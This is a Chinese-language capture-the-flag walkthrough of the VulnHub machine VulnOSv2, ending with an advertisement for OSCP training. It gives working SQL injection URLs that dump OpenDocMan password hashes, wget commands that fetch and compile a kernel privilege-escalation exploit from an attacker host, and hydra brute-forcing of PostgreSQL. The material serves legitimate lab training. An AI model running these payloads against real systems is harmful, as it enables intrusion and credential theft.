打靶日记 VulnHub靶机 VulnOSv2

admin 2025年3月26日08:54:22评论12 views字数 4323阅读14分24秒阅读模式

一、探测靶机IP(进行信息收集)

主机发现

arp-scan -l
打靶日记 VulnHub靶机 VulnOSv2
nmap -sS -sV -p- -T5 192.168.253.232 -A
打靶日记 VulnHub靶机 VulnOSv2

二、进入网页信息收集

打靶日记 VulnHub靶机 VulnOSv2

进行目录扫描

dirb http://192.168.253.232/jabc/
打靶日记 VulnHub靶机 VulnOSv2

尝试dirsearch去找有没有隐藏的文件

dirsearch -u http://192.168.253.232/jabc/
打靶日记 VulnHub靶机 VulnOSv2

发现一个robots.txt,

打靶日记 VulnHub靶机 VulnOSv2

在q=user目录下发现一个登录界面

打靶日记 VulnHub靶机 VulnOSv2

到网页进行信息搜集,逆天,这里字是黑色的,在Documentation页面发现/jabcd0cs/目录

打靶日记 VulnHub靶机 VulnOSv2

查看网页源代码

打靶日记 VulnHub靶机 VulnOSv2

发现guest用户,密码也是guest,也就是临时用户,通常是低权限用户,有时候可能会开启共享服务,通过guest用户来进行横向移动

打靶日记 VulnHub靶机 VulnOSv2

进入guest用户,发现文件上传,这里不允许上传php,尝试反弹shell,成功绕过,但是没找到目录进行访问文件,

上传一个jpg图片,使用burp抓包,修改文件后缀将.jpg改为.php.jpg或者.php.尝试

打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2

三、SQL注入

在最开始的登录界面尝试过万能密码没成功,看到OpenDocMan 1.2.7,去看看有没有漏洞,结果有

打靶日记 VulnHub靶机 VulnOSv2

这里有利用方法,利用SQL注入

打靶日记 VulnHub靶机 VulnOSv2
http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9
打靶日记 VulnHub靶机 VulnOSv2

查库名

http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,database(),3,4,5,6,7,8,9
打靶日记 VulnHub靶机 VulnOSv2

查表名

http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(table_name),3,4,5,6,7,8,9 from information_schema.tables where table_schema= database()
打靶日记 VulnHub靶机 VulnOSv2

检查是否存在单引号过滤或转义机制

http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1'

页面正常无错误: 可能说明单引号被过滤(直接删除)或转义(如转换为 ')。

打靶日记 VulnHub靶机 VulnOSv2

列odm_user表

odm_user

因为可能存在单引号转义机制,用十六进制编码替代字符串,避免单引号使用

http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(column_name),3,4,5,6,7,8,9 from information_schema.columns where table_name=0x6f646d5f75736572 and table_schema=database()

table_schema=database():限定只查询当前数据库的表字段,确保结果唯一性

打靶日记 VulnHub靶机 VulnOSv2

获取 odm_user 表中 username 和 Password 列的数据

group_concat(Username,0x7e,Password) 会将 Users 表中每一行的 Username 和 Password 字段值连接起来,中间用 0x7e 分隔。0x7e 是十六进制表示,对应的 ASCII 字符是波浪线 ~,便于区分不同字段

http://192.168.253.232/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,group_concat(Username,0x7e,Password),3,4,5,6,7,8,9 from odm_user --+
打靶日记 VulnHub靶机 VulnOSv2

webmin~b78aae356709f8c31118ea613980954b

guest~0844e0343a0486ff05530df6c705c8bb4

直接得到用户名和加密后的密码,这时可以用kali自带的hash-identifier

打靶日记 VulnHub靶机 VulnOSv2

推荐这个网站解密:https://hashes.com/en/decrypt/hash

或者用这个https://www.somd5.com/

webmin~webmin1980

四、登录webmin用户(OpenDocMan

OpenDocMan 文档管理系统

OpenDocMan 是一个基于 PHP 的开源文档管理系统(DMS),旨在符合 ISO 17025 和 OIE 标准。它提供了对文件的细粒度访问控制,并支持自动安装和升级(1)(2)。

主要功能

  • 文件上传:用户可以通过网页浏览器上传文件。

  • 访问控制:基于部门或个人用户权限控制文件访问。

  • 版本跟踪:跟踪文档的修订版本。

  • 审核流程:可以设置新文件和更新文件的审核流程。

  • 兼容性:可以安装在大多数支持 PHP 的 Web 服务器上

webmin有管理员用户,guest没有,可以看到这里的

打靶日记 VulnHub靶机 VulnOSv2

点击添加文件格式(Add File Type)

打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2

上传成功

打靶日记 VulnHub靶机 VulnOSv2

文件都会上传到这个目录下,在Admin的Edit setting下

打靶日记 VulnHub靶机 VulnOSv2

发现为/jabcd0cs/uploads/目录

打靶日记 VulnHub靶机 VulnOSv2

发现上传的都变成了dat格式,这条路行不通

打靶日记 VulnHub靶机 VulnOSv2

五、提权

内核提权

直接去尝试ssh登录

打靶日记 VulnHub靶机 VulnOSv2

登录成功

建立交互式终端

python -c "import pty; pty.spawn('/bin/bash');"

查看版本信息

uname -a 
lsb_release -a
打靶日记 VulnHub靶机 VulnOSv2

Linux 3.13 ubuntu为14.04 ,优先尝试37292.c和37293.txt

searchsploit ubuntu 14.04 privilege | grep -v 'x86-64' 
打靶日记 VulnHub靶机 VulnOSv2
#kali(攻击机)
searchsploit -m 37292.c
python -m http.server
#靶机
wget http://192.168.253.129:8000/37292.c
gcc -o exp 37292.c
chmod +x exp
./exp
打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2

postgresql数据库爆破

这个方法是从别的师傅那看到的方法

由于webmin没有****netstat-p选项的权限,所以得netstat两遍:

netstat -p
  • -p:Process 的缩写,用于显示与网络连接相关的 进程 ID(PID) 和 进程名称。
netstat -ant
打靶日记 VulnHub靶机 VulnOSv2
netstat -at
  • netstat:网络状态(Network Statistics)的缩写,用于显示网络连接、路由表、接口统计等信息。

  • -a:显示所有活动的网络连接(包括监听状态的连接)。

  • -t:仅显示 TCP 协议的连接(对应 UDP 协议用 -u)。

打靶日记 VulnHub靶机 VulnOSv2

PostgreSQL 是一个功能强大的开源对象关系型数据库系统。它不仅使用和扩展了SQL语言,还结合了许多安全存储和扩展最复杂数据工作负载的功能,一般存在空密码漏洞

没权限进入vulnosadmin目录,在webmin目录下发现post解压

打靶日记 VulnHub靶机 VulnOSv2

进入post

cd post
ls
./configure
make

下载成功后,攻击机上进入/usr/share/metasploit-framework/data/wordlists目录,开http服务

cd /usr/share/metasploit-framework/data/wordlists
python -m http.server
# 下载postgres_default_pass.txt和postgres_default_user.txt字典
wget http://192.168.253.129:8000/postgres_default_pass.txt
wget http://192.168.253.129:8000/postgres_default_user.txt
打靶日记 VulnHub靶机 VulnOSv2

用hydra进行爆破

./hydra -L postgres_default_user.txt -P postgres_default_pass.txt localhost postgres
打靶日记 VulnHub靶机 VulnOSv2

postgres postgres

登录postgresql

psql -h localhost -U postgres

登录成功

打靶日记 VulnHub靶机 VulnOSv2

查看所有数据库

l
  • h:查看SQL命令的解释,比如h select。

  • ?:查看psql命令列表。

  • l:列出所有数据库。

  • c [database_name]:进入数据库。

  • d:列出当前数据库的所有表格。

  • d [table_name]:列出某一张表格的结构。

  • du:列出所有用户。

  • e:打开文本编辑器。

  • conninfo:列出当前数据库和连接的信息。

  • q:退出

打靶日记 VulnHub靶机 VulnOSv2

进入system数据库

 c system

列出system数据库的表

 d
打靶日记 VulnHub靶机 VulnOSv2

获取system数据库users表的内容(注意结尾分号,关键字大写)

SELECT * FROM users;
打靶日记 VulnHub靶机 VulnOSv2

得到vulnosadmin的密码c4nuh4ckm3tw1c3

再ssh去连接vulnosadmin用户

打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2

发现有一个r00t.blend的文件

在靶机上开启一个简单的http简易服务

python -m SimpleHTTPServer 8888

在攻击机kali上将文件下载下来

wget http://192.168.253.232:8888/r00t.blend

到https://imagetostl.com/cn/view-blend-online这个网站打开

将blender文件上传到网站可以看到ab12fg//drg,为root密码

ssh [email protected]

直接登录为root,提权成功

END

oscp有对红队工作感兴趣,或者有意报考oscp的师傅,可以考虑一下我们的培训课程,加我微信咨询,好处如下:

1.报考后课程随时可看,并且如果对考试没有信心,还可以留群跟第二批课程学习,不限次数时间,报考即是一辈子可看

2.200+台靶机及官方课程,lab靶机+域的内容团队泷老师和小羽老师会带大家全部过一遍,并且群内随时答疑,团队老师及群友都会积极解答,全天可答疑

3.目前可接受分期付款,无利息,最多分四个月,第一次付完即可观看视频

4.加入课程可享受工作推荐机会,优秀者可内推至红队

5.报考即送送官方文档中文版,以及kali命令详解中文版,纯人工翻译,版权为团队所有

打靶日记 VulnHub靶机 VulnOSv2

知识星球

还可以加入我们的知识星球,包含cs二开,甲壳虫,红盟工具等,还有很多src挖掘资料包

打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2
打靶日记 VulnHub靶机 VulnOSv2

原文始发于微信公众号(泷羽Sec-临观):打靶日记 VulnHub靶机 VulnOSv2

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年3月26日08:54:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   打靶日记 VulnHub靶机 VulnOSv2https://cn-sec.com/archives/3885314.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息